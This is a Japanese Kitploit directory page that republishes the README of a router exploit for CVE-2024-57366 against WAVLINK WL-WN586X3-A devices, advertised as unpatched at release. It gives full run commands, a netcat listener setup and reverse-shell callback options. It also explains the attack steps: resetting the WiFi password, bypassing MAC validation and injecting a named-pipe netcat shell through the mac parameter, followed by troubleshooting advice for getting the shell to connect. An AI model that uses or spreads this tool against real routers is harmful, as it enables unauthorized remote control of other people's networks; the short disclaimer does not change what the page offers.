Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-57366 — WAVLINK WL-WN586X3-A ルーター向け CVE-2024-57366 の製品化されたエクスプロイト (本リリース時点では未パッチ!) | Kitploit
ツール/GitHubGitHub/h4ckusaur/cve-2024-57366
IoTセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ワイヤレスセキュリティペネトレーションテストコマンド&コントロールレッドチーミングペイロード開発
GitHubh4ckusaur/cve-2024-57366

CVE-2024-57366

WAVLINK WL-WN586X3-A ルーター向け CVE-2024-57366 の製品化されたエクスプロイト (本リリース時点では未パッチ!)

11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2024-57366 エクスプロイト

CVE-2024-57366に対する堅牢なエクスプロイトです。MACアドレス検証のバイパスとコマンドインジェクションにより、脆弱なルーター上でリモートコード実行を可能にします。

これは認証後のエクスプロイトであり、ルーターの「リモートコントロール」機能がオンになっていることと、管理パスワードが必要です。管理者ユーザー名は「admin」にハードコードされています。

🚀 特徴

  • 自動MACアドレス登録 - WiFiに接続してルーターにMACアドレスを登録します
  • ネットワーク維持型エクスプロイト - エクスプロイト中に既存のネットワーク接続を維持します
  • MACアドレスキャッシュ - キャッシュされた成功MACアドレスを使用して迅速な再エクスプロイト
  • BurpSuite互換 - 最大の信頼性のために正確なリクエスト形式に一致
  • タイムアウト処理 - リバースシェル接続が予想される場合の有益なメッセージ
  • ユーザーフレンドリー - 簡単な管理のためのシンプルなテキストベースのMACアドレスキャッシュ

📋 必要条件

  • Python 3.6+
  • ワイヤレスアダプターを備えたLinuxシステム
  • sudo アクセス(ネットワークインターフェース管理に必要)
  • CVE-2024-57366に対して脆弱なターゲットルーター

🛠️ インストール

  1. エクスプロイトファイルをクローンまたはダウンロード
  2. 必要なPythonパッケージがインストールされていることを確認してください:
    root@kitploit:~
    pip3 install requests
    

🎯 使用方法

基本エクスプロイト(初回)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

クイックエクスプロイト(キャッシュされたMACを使用)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Script will ask: "Use cached MAC for quick exploit? (y/n):" - say "y"

フルエクスプロイトの強制(キャッシュをスキップ)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full

キャッシュされたMACアドレスを表示

root@kitploit:~
python3 exploit.py --list-cached

📖 コマンドラインオプション

  • --target - ターゲットルーターのIPアドレス(デフォルト: 127.0.0.1)
  • --port - ターゲットルーターのポート(デフォルト: 80)
  • --local-ip - リバースシェルコールバック用のローカルIPアドレス
  • --local-port - リバースシェルコールバック用のローカルポート(デフォルト: 4444)
  • --password - ルーターの管理者パスワード
  • --ssid - WiFiネットワーク名(デフォルト: WAVLINK-Mesh_DC4B)
  • --force-full - フルエクスプロイトを強制し、キャッシュされたMACチェックをスキップ
  • --list-cached - キャッシュされたMACアドレスを表示して終了

🔧 動作の仕組み

技術概要

CVE-2024-57366は、ルーターファームウェアのMACアドレス検証バイパスを悪用します。この脆弱性により、/protocol.csp エンドポイントの mac パラメータを介したコマンドインジェクションが可能になります。

エクスプロイトのプロセス

  1. 認証 - ルーターから認証トークンを抽出
  2. WiFiパスワードリセット - ルーターのWiFiパスワードを管理者パスワードにリセット
  3. MAC登録 - WiFiに接続してルーターにMACアドレスを登録
  4. コマンドインジェクション - 登録されたMACを使用してリバースシェルペイロードを注入
  5. ネットワーク維持 - 全体を通して既存のネットワーク接続を維持

主要な技術詳細

  • MAC検証バイパス: ルーターはWiFiに接続したかどうかを確認してMACアドレスを検証
  • ネットワークインターフェースバインディング: 元のネットワークコンテキストを維持するために eth0 インターフェースを使用
  • リクエスト形式: BurpSuiteの形式に正確に一致(index=1、トークンはURLパス内)
  • ペイロード: 信頼性のための名前付きパイプを使用したNetcatリバースシェル

MACアドレスキャッシュ

エクスプロイトは成功したMACアドレスを自動的に successful_macs.txt にキャッシュします:

root@kitploit:~
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here

32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08

手動MAC追加: successful_macs.txt を編集して以下のような行を追加します:

root@kitploit:~
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08

🎯 使用例

初回エクスプロイト試行

root@kitploit:~
# Start netcat listener
nc -lvp 4444

# Run exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

# When prompted to save MAC address, say "y"

後続のエクスプロイト(はるかに高速)

root@kitploit:~
# Start netcat listener
nc -lvp 4444

# Run exploit (will use cached MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Say "y" when asked about using cached MAC

🔍 トラブルシューティング

一般的な問題

  1. 「ワイヤレスアダプターが見つかりません」

    • ワイヤレスアダプターが有効になっていることを確認
    • WiFiがオンになっていることを確認
    • sudo で実行してみる
  2. 「MACアドレス検証に失敗しました」

    • MACアドレスをルーターに登録する必要があります
    • WiFi接続手順が正常に完了したことを確認
    • 最初に手動でWiFiに接続してみる
  3. 「リクエストがタイムアウトしました」

    • これは実際にはエクスプロイトが成功したことを意味するかもしれません!
    • netcatリスナーでリバースシェル接続を確認
    • ルーターがコマンドを実行しているがHTTPに応答していない可能性があります
  4. 「リバースシェルが接続しません」

    • --local-ip が正しいことを確認(ip addr show eth0 を使用)
    • ファイアウォールが接続をブロックしていないことを確認
    • netcatリスナーが正しいポートで実行されていることを確認

ネットワーク要件

  • eth0 インターフェース: ネットワーク維持のためにIPアドレスが必要
  • ワイヤレスアダプター: 初期MAC登録に必要
  • ルーターへのアクセス: eth0インターフェース経由でルーターに到達可能である必要

📁 ファイル構成

root@kitploit:~
CVE-2024-57366/
├── exploit.py              # Main exploit script
├── successful_macs.txt     # MAC address cache (auto-generated)
└── README.md              # This file

⚠️ 免責事項

このツールは教育および許可されたテスト目的のみです。所有しているシステム、またはテストする明示的な許可があるシステムでのみ使用してください。作者はこのツールの誤用について一切責任を負いません。

🔗 参照

  • CVE-2024-57366
  • ルーターファームウェアのMACアドレス検証の脆弱性
  • /protocol.csp エンドポイントを介したコマンドインジェクション

📝 ライセンス

このプロジェクトは現状のままで教育目的で提供されます。責任を持って、適用される法律や規制に従って使用してください。

ツールをダウンロード